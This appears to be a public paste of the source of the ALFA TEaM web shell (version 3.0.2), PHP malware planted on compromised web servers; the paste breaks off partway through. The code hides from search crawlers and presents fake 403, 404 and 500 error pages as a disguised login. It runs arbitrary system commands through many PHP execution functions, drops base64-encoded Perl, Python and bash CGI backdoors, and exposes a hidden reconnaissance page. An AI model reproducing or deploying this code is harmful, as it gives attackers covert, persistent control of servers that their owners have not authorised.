· 6 years ago · Apr 01, 2020, 08:50 AM
1<?php
2$GLOBALS['DB_NAME'] = array(
3 'user' => 'admin',
4 'pass' => '56aed7e7485ff03d5605b885b86e947e',//alfa
5 'safemode' => '0',
6 'login_page' => '403',
7 'show_icons' => '1',
8 'post_encryption' => false,
9 'color' => array("shell_border" => "#0E304A","header_vars" => "#27979B","header_values" => "#67ABDF","header_on" => "#00FF00","header_off" => "#ff0000","header_none" => "#00FF00","home_shell" => "#ff0000","home_shell:hover" => "#FFFFFF","back_shell" => "#efbe73","back_shell:hover" => "#FFFFFF","header_pwd" => "#00FF00","header_pwd:hover" => "#FFFFFF","header_drive" => "#00FF00","header_drive:hover" => "#FFFFFF","header_show_all" => "#00FF00","disable_functions" => "#ff0000","footer_text" => "#27979B","menu_options" => "#27979B","menu_options:hover" => "#646464","options_list" => "#00FF00","options_list:hover" => "#FFFFFF","options_list_header" => "#59cc33","options_list_text" => "#FFFFFF","Alfa+" => "#27E8AE","hidden_shell_text" => "#00FF00","hidden_shell_version" => "#ff0000","shell_name" => "#FF0000","main_row:hover" => "#646464","main_header" => "#FFFFFF","main_name" => "#FFFFFF","main_size" => "#67ABDF","main_modify" => "#67ABDF","main_owner_group" => "#67ABDF","main_green_perm" => "#25ff00","main_red_perm" => "#FF0000","main_white_perm" => "#FFFFFF","beetween_perms" => "#FFFFFF","main_actions" => "#FFFFFF","minimize_editor_background" => "#0e304a","minimize_editor_text" => "#f5deb3","editor_border" => "#0e304a","editor_background" => "rgba(0, 1, 23, 0.94)","editor_header_background" => "rgba(21, 66, 88, 0.93)","editor_header_text" => "#00ff7f","editor_header_button" => "#1d5673","editor_actions" => "#FFFFFF","editor_file_info_vars" => "#FFFFFF","editor_file_info_values" => "#67ABDF","editor_history_header" => "#14ff07","editor_history_list" => "#03b3a3","editor_history_selected_file" => "rgba(49, 55, 93, 0.77)","editor_history_file:hover" => "#646464","input_box_border" => "#0E304A","input_box_text" => "#999999","input_box:hover" => "#27979B","select_box_border" => "#0E304A","select_box_text" => "#FFFFEE","select_box:hover" => "#27979B","button_border" => "#27979B","button:hover" => "#27979B","outputs_text" => "#67ABDF","outputs_border" => "#0E304A","uploader_border" => "#0E304A","uploader_background" => "#0E304A","uploader_text_right" => "#FFFFFF","uploader_text_left" => "#25ff00","uploader:hover" => "#27979B","uploader_progress_bar" => "#ff0000","mysql_tables" => "#00FF00","mysql_table_count" => "#67ABDF","copyright" => "#ff0000","scrollbar" => "#1e82b5","scrollbar_background" => "#000115",),
10);
11
12
13if(!function_exists('base64_encode')){
14function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return data;}do{$o1 = charCodeAt($data, $i++);$o2 = charCodeAt($data, $i++);$o3 = charCodeAt($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}
15}else{
16function __ZW5jb2Rlcg($s){return base64_encode($s);}
17}
18
19if(!function_exists('base64_decode')){
20function __ZGVjb2Rlcg($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}
21}else{
22function __ZGVjb2Rlcg($s){return base64_decode($s);}
23}
24
25if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
26if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
27if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
28if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
29if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
30if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
31if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
32date_default_timezone_set('Asia/Tehran');
33define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
34define("__ALFA_VERSION__", "3.0.2");
35define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
36define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
37define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
38$GLOBALS['__ALFA_COLOR__'] = array(
39 "shell_border" => array(
40 "key_color" => "#0E304A",
41 "multi_selector" => array(
42 ".header" => "border: 7px solid {color}",
43 "#meunlist" => "border-color: {color}",
44 "#hidden_sh" => "background-color: {color}",
45 ".ajaxarea" => "border: 1px solid {color}",
46 ".foot" => "border-color: {color}",
47 )
48 ),
49 "header_vars" => "#27979B",
50 "header_values" => "#67ABDF",
51 "header_on" => "#00FF00",
52 "header_off" => "#ff0000",
53 "header_none" => "#00FF00",
54 "home_shell" => "#ff0000",
55 "home_shell:hover" => array(
56 "key_color" => "#FFFFFF",
57 "multi_selector" => array(
58 ".home_shell:hover" => "color: {color};",
59 )
60 ),
61 "back_shell" => "#efbe73",
62 "back_shell:hover" => array(
63 "key_color" => "#FFFFFF",
64 "multi_selector" => array(
65 ".back_shell:hover" => "color: {color};",
66 )
67 ),
68 "header_pwd" => "#00FF00",
69 "header_pwd:hover" => array(
70 "key_color" => "#FFFFFF",
71 "multi_selector" => array(
72 ".header_pwd:hover" => "color: {color};",
73 )
74 ),
75 "header_drive" => "#00FF00",
76 "header_drive:hover" => array(
77 "key_color" => "#FFFFFF",
78 "multi_selector" => array(
79 ".header_drive:hover" => "color: {color};",
80 )
81 ),
82 "header_show_all" => "#00FF00",
83 "disable_functions" => "#ff0000",
84 "footer_text" => "#27979B",
85 "menu_options" => "#27979B",
86 "menu_options:hover" => array(
87 "key_color" => "#646464",
88 "multi_selector" => array(
89 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
90 )
91 ),
92 "options_list" => array(
93 "key_color" => "#00FF00",
94 "multi_selector" => array(
95 ".ajaxarea .header center a" => "color: {color};",
96 )
97 ),
98 "options_list:hover" => array(
99 "key_color" => "#FFFFFF",
100 "multi_selector" => array(
101 ".ajaxarea .header center a:hover" => "color: {color};",
102 )
103 ),
104 "options_list_header" => array(
105 "key_color" => "#59cc33",
106 "multi_selector" => array(
107 ".txtfont_header" => "color: {color};",
108 )
109 ),
110 "options_list_text" => array(
111 "key_color" => "#FFFFFF",
112 "multi_selector" => array(
113 ".txtfont,.tbltxt" => "color: {color};",
114 )
115 ),
116 "Alfa+" => array(
117 "key_color" => "#27E8AE",
118 "multi_selector" => array(
119 ".alfa_plus" => "color: {color};font-weight: unset;",
120 )
121 ),
122 "hidden_shell_text" => array(
123 "key_color" => "#00FF00",
124 "multi_selector" => array(
125 "#hidden_sh a" => "color: {color};",
126 )
127 ),
128 "hidden_shell_version" => "#ff0000",
129 "shell_name" => "#FF0000",
130 "main_row:hover" => array(
131 "key_color" => "#646464",
132 "multi_selector" => array(
133 ".main tr:hover" => "background-color: {color};",
134 )
135 ),
136 "main_header" => array(
137 "key_color" => "#FFFFFF",
138 "multi_selector" => array(
139 ".main th" => "color: {color};",
140 )
141 ),
142 "main_name" => array(
143 "key_color" => "#FFFFFF",
144 "multi_selector" => array(
145 ".main .main_name" => "color: {color};font-weight: unset;",
146 )
147 ),
148 "main_size" => "#67ABDF",
149 "main_modify" => "#67ABDF",
150 "main_owner_group" => "#67ABDF",
151 "main_green_perm" => "#25ff00",
152 "main_red_perm" => "#FF0000",
153 "main_white_perm" => "#FFFFFF",
154 "beetween_perms" => "#FFFFFF",
155 "main_actions" => array(
156 "key_color" => "#FFFFFF",
157 "multi_selector" => array(
158 ".main .actions" => "color: {color};",
159 )
160 ),
161 "menu_options:hover" => array(
162 "key_color" => "#646464",
163 "multi_selector" => array(
164 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
165 )
166 ),
167 "minimize_editor_background" => array(
168 "key_color" => "#0e304a",
169 "multi_selector" => array(
170 ".minimized-wrapper" => "background-color: {color};",
171 )
172 ),
173 "minimize_editor_text" => array(
174 "key_color" => "#f5deb3",
175 "multi_selector" => array(
176 ".minimized-text" => "color: {color};",
177 )
178 ),
179 "editor_border" => array(
180 "key_color" => "#0e304a",
181 "multi_selector" => array(
182 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
183 )
184 ),
185 "editor_background" => array(
186 "key_color" => "rgba(0, 1, 23, 0.94)",
187 "multi_selector" => array(
188 ".editor-explorer,.editor-modal" => "background-color: {color};",
189 )
190 ),
191 "editor_header_background" => array(
192 "key_color" => "rgba(21, 66, 88, 0.93)",
193 "multi_selector" => array(
194 ".editor-header" => "background-color: {color};",
195 )
196 ),
197 "editor_header_text" => array(
198 "key_color" => "#00ff7f",
199 "multi_selector" => array(
200 ".editor-path" => "color: {color};",
201 )
202 ),
203 "editor_header_button" => array(
204 "key_color" => "#1d5673",
205 "multi_selector" => array(
206 ".close-button, .editor-minimize" => "background-color: {color};",
207 )
208 ),
209 "editor_actions" => array(
210 "key_color" => "#FFFFFF",
211 "multi_selector" => array(
212 ".editor_actions" => "color: {color};",
213 )
214 ),
215 "editor_file_info_vars" => array(
216 "key_color" => "#FFFFFF",
217 "multi_selector" => array(
218 ".editor_file_info_vars" => "color: {color};",
219 )
220 ),
221 "editor_file_info_values" => array(
222 "key_color" => "#67ABDF",
223 "multi_selector" => array(
224 ".filestools" => "color: {color};",
225 )
226 ),
227 "editor_history_header" => array(
228 "key_color" => "#14ff07",
229 "multi_selector" => array(
230 ".hheader-text,.history-clear" => "color: {color};",
231 )
232 ),
233 "editor_history_list" => array(
234 "key_color" => "#03b3a3",
235 "multi_selector" => array(
236 ".editor-file-name" => "color: {color};",
237 )
238 ),
239 "editor_history_selected_file" => array(
240 "key_color" => "rgba(49, 55, 93, 0.77)",
241 "multi_selector" => array(
242 ".is_active" => "background-color: {color};",
243 )
244 ),
245 "editor_history_file:hover" => array(
246 "key_color" => "#646464",
247 "multi_selector" => array(
248 ".file-holder > .history:hover" => "background-color: {color};",
249 )
250 ),
251 "input_box_border" => array(
252 "key_color" => "#0E304A",
253 "multi_selector" => array(
254 "input[type=text],textarea" => "border: 1px solid {color}",
255 )
256 ),
257 "input_box_text" => array(
258 "key_color" => "#999999",
259 "multi_selector" => array(
260 "input[type=text],textarea" => "color: {color};",
261 )
262 ),
263 "input_box:hover" => array(
264 "key_color" => "#27979B",
265 "multi_selector" => array(
266 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
267 )
268 ),
269 "select_box_border" => array(
270 "key_color" => "#0E304A",
271 "multi_selector" => array(
272 "select" => "border: 1px solid {color}",
273 )
274 ),
275 "select_box_text" => array(
276 "key_color" => "#FFFFEE",
277 "multi_selector" => array(
278 "select" => "color: {color};",
279 )
280 ),
281 "select_box:hover" => array(
282 "key_color" => "#27979B",
283 "multi_selector" => array(
284 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
285 )
286 ),
287 "button_border" => array(
288 "key_color" => "#27979B",
289 "multi_selector" => array(
290 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
291 )
292 ),
293 "button:hover" => array(
294 "key_color" => "#27979B",
295 "multi_selector" => array(
296 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
297 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
298 )
299 ),
300 "outputs_text" => array(
301 "key_color" => "#67ABDF",
302 "multi_selector" => array(
303 ".ml1" => "color: {color};",
304 )
305 ),
306 "outputs_border" => array(
307 "key_color" => "#0E304A",
308 "multi_selector" => array(
309 ".ml1" => "border: 1px solid {color};",
310 )
311 ),
312 "uploader_border" => array(
313 "key_color" => "#0E304A",
314 "multi_selector" => array(
315 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
316 )
317 ),
318 "uploader_background" => array(
319 "key_color" => "#0E304A",
320 "multi_selector" => array(
321 ".inputfile strong" => "background-color: {color};",
322 )
323 ),
324 "uploader_text_right" => array(
325 "key_color" => "#FFFFFF",
326 "multi_selector" => array(
327 ".inputfile strong" => "color: {color};",
328 )
329 ),
330 "uploader_text_left" => array(
331 "key_color" => "#25ff00",
332 "multi_selector" => array(
333 ".inputfile span" => "color: {color};",
334 )
335 ),
336 "uploader:hover" => array(
337 "key_color" => "#27979B",
338 "multi_selector" => array(
339 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
340 )
341 ),
342 "uploader_progress_bar" => array(
343 "key_color" => "#ff0000",
344 "multi_selector" => array(
345 "#up_bar" => "background-color: {color};",
346 )
347 ),
348 "mysql_tables" => "#00FF00",
349 "mysql_table_count" => "#67ABDF",
350 "copyright" => "#ff0000",
351 "scrollbar" => array(
352 "key_color" => "#1e82b5",
353 "multi_selector" => array(
354 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
355 )
356 ),
357 "scrollbar_background" => array(
358 "key_color" => "#000115",
359 "multi_selector" => array(
360 "*::-webkit-scrollbar-track" => "background-color: {color};",
361 )
362 ),
363);
364$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
365$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
366@session_start();
367if($config['AlfaProtectShell']){
368$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
369$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
370if($config['AlfaLoginPage'] == 'gui'){
371if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
372if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
373@$_SESSION["AlfaUser"] = $config['AlfaUser'];
374@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
375@header('location: '.$_SERVER["PHP_SELF"]);
376}
377echo '
378<style>
379body{background: black;}
380#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
381#loginbox td { border-radius:5px; font-size:11px; }
382</style>
383<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
384<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
385<div id=loginbox><p><font face="verdana,arial" size=-1>
386<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
387<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
388<tr><td bgcolor="black" style="padding:5">
389<form method="post">
390<input type="hidden" name="action" value="login">
391<input type="hidden" name="hide" value="">
392<center><table>
393<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
394<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
395<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
396</div><br /></center>';
397exit;
398}
399}elseif($config['AlfaLoginPage']=='500'){
400if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
401if(@md5($_POST["password"])==$config['AlfaPass']){
402@$_SESSION["AlfaUser"] = $config['AlfaUser'];
403@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
404header('location: '.$_SERVER["PHP_SELF"]);
405}
406echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
407exit;
408}
409}elseif($config['AlfaLoginPage']=='403'){
410if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
411if(@md5($_POST["password"])==$config['AlfaPass']){
412@$_SESSION["AlfaUser"] = $config['AlfaUser'];
413@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
414header('location: '.$_SERVER["PHP_SELF"]);
415}
416echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
417exit;
418}
419}elseif($config['AlfaLoginPage']=='404'){
420if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
421if(@md5($_POST["password"])==$config['AlfaPass']){
422@$_SESSION["AlfaUser"] = $config['AlfaUser'];
423@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
424header('location: '.$_SERVER["PHP_SELF"]);
425}
426echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
427exit;
428}
429}
430}
431function decrypt_post($str, $pwd){
432 if(__ALFA_POST_ENCRYPTION__){
433 $pwd = __ZW5jb2Rlcg($pwd);
434 $str = __ZGVjb2Rlcg($str);
435 $enc_chr = "";
436 $enc_str = "";
437 $i = 0;
438 while ($i < strlen($str)) {
439 for ($j = 0; $j < strlen($pwd); $j++) {
440 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
441 $enc_str .= $enc_chr;
442 $i++;
443 if ($i >= strlen($str))
444 break;
445 }
446 }
447 return __ZGVjb2Rlcg($enc_str);
448 }else{
449 return __ZGVjb2Rlcg($str);
450 }
451}
452
453function _AlfaSecretKey(){
454 if(!isset($_SESSION["AlfaSecretKey"])){
455 $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
456 }
457 return $_SESSION["AlfaSecretKey"];
458}
459function alfa_getColor($target){
460 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
461 return $GLOBALS["DB_NAME"]["color"][$target];
462 }else{
463 $target = $GLOBALS["__ALFA_COLOR__"][$target];
464 if(is_array($target)){
465 return $target["key_color"];
466 }else{
467 return $target;
468 }
469 }
470}
471function alfaCssLoadColors(){
472 $css = "";
473 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
474 if(!is_array($value)){
475 $value = alfa_getColor($key);
476 $css .= ".{$key}{color: {$value};}";
477 }else{
478 if(isset($value["multi_selector"])){
479 foreach($value["multi_selector"] as $k => $v){
480 $color = alfa_getColor($key);
481 $code = str_replace("{color}", $color, $v);
482 $css .= $k."{".$code."}";
483 }
484 }
485 }
486 }
487 return $css;
488}
489if(isset($_POST['ajax'])){
490function AlfaNum(){
491$args = func_get_args();
492$alfax = array();
493$find = array();
494for($i=1;$i<=10;$i++){
495$alfax[] = $i;
496}
497foreach($args as $arg){
498$find[] = $arg;
499}
500echo '<script>';
501foreach($alfax as $alfa){
502if(in_array($alfa,$find))
503continue;
504echo 'alfa'.$alfa."_=";
505}
506echo '""</script>';
507}}
508function _alfa_cgicmd($cmd,$lang="perl"){
509 if(isset($_SESSION["alfacgiapi_mode"])){
510 return "";
511 }
512 $cmd_pure = $cmd;
513 $is_curl = function_exists('curl_version');
514 $is_socket = function_exists('fsockopen');
515 if($is_curl||$is_socket){
516 $recreate = false;
517 if(isset($_SESSION["alfacgiapi"])){
518 if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
519 $recreate = true;
520 $lang = $_SESSION["alfacgiapi"];
521 }
522 }
523 if(!isset($_SESSION["alfacgiapi"])||$recreate){
524 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
525 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
526 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
527 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
528 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
529 alfaWriteTocgiapi($lang.".alfa",$source);
530 alfacgihtaccess('cgi', "alfacgiapi/");
531 }else{
532 $lang = $_SESSION["alfacgiapi"];
533 }
534 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
535 if($is_curl){
536 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
537 $post = new AlfaCURL();
538 $data = $post->Send($address, "post", $cmd);
539 }elseif($is_socket){
540 $server = $_SERVER["SERVER_NAME"];
541 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
542 $data = _alfa_fsockopen($server,$uri,$cmd);
543 }
544 $out = "";
545 if(strstr($data, "[solevisible~api]")){
546 $_SESSION["alfacgiapi"] = $lang;
547 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
548 $out = $res[1];
549 }
550 }elseif($lang=="perl"){
551 return _alfa_cgicmd($cmd_pure,"py");
552 }elseif($lang=="py"){
553 return _alfa_cgicmd($cmd_pure,"bash");
554 }else{
555 $_SESSION["alfacgiapi_mode"] = "off";
556 }
557 return trim($out);
558 }else{
559 return "";
560 }
561}
562function alfaEx($in,$re=false,$cgi=true,$all=false){
563 $data = _alfa_php_cmd($in,$re);
564 if(empty($data)&&$cgi||$all){
565 if($GLOBALS['sys']=='unix'){
566 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
567 $cmd = _alfa_cgicmd($in);
568 if(!empty($cmd)){
569 return $cmd;
570 }
571 }
572 }
573 }
574 return $data;
575}
576function _alfa_php_cmd($in,$re=false){
577$out='';
578try{
579if($re)$in=$in." 2>&1";
580if(function_exists('exec')){
581@exec($in,$out);
582$out = @join("\n",$out);
583}elseif(function_exists('passthru')) {
584ob_start();
585@passthru($in);
586$out = ob_get_clean();
587}elseif(function_exists('system')){
588ob_start();
589@system($in);
590$out = ob_get_clean();
591} elseif (function_exists('shell_exec')) {
592$out = shell_exec($in);
593}elseif(function_exists("popen")&&function_exists("pclose")){
594if(is_resource($f = @popen($in,"r"))){
595$out = "";
596while(!@feof($f))
597$out .= fread($f,1024);
598pclose($f);
599}
600}elseif(function_exists('proc_open')){
601$pipes = array();
602$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
603$out=@stream_get_contents($pipes[1]);
604}elseif(class_exists('COM')){
605$alfaWs = new COM('WScript.shell');
606$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
607$stdout = $exec->StdOut();
608$out=$stdout->ReadAll();
609}
610}catch(Exception $e){}
611return $out;
612}
613function _alfa_fsockopen($server,$uri,$post){
614 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
615 if($socket){
616 $http = "POST {$uri} HTTP/1.0\r\n";
617 $http .= "Host: {$server}\r\n";
618 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
619 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
620 $http .= "Content-length: " . strlen($post) . "\r\n";
621 $http .= "Connection: close\r\n\r\n";
622 $http .= $post . "\r\n\r\n";
623 fwrite($socket, $http);
624 $contents = "";
625 while (!@feof($socket)) {
626 $contents .= @fgets($socket, 4096);
627 }
628 list($header, $body) = explode("\r\n\r\n", $contents, 2);
629 @fclose($socket);
630 return $body;
631 }else{
632 return "";
633 }
634}
635if(isset($_GET["solevisible"])){
636@error_reporting(E_ALL ^ E_NOTICE);
637echo '<html>';
638echo "<title>Solevisible Hidden Shell</title>";
639echo "<body bgcolor=#000000>";
640echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
641$safe_mode = @ini_get('safe_mode');
642if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
643echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
644echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
645echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
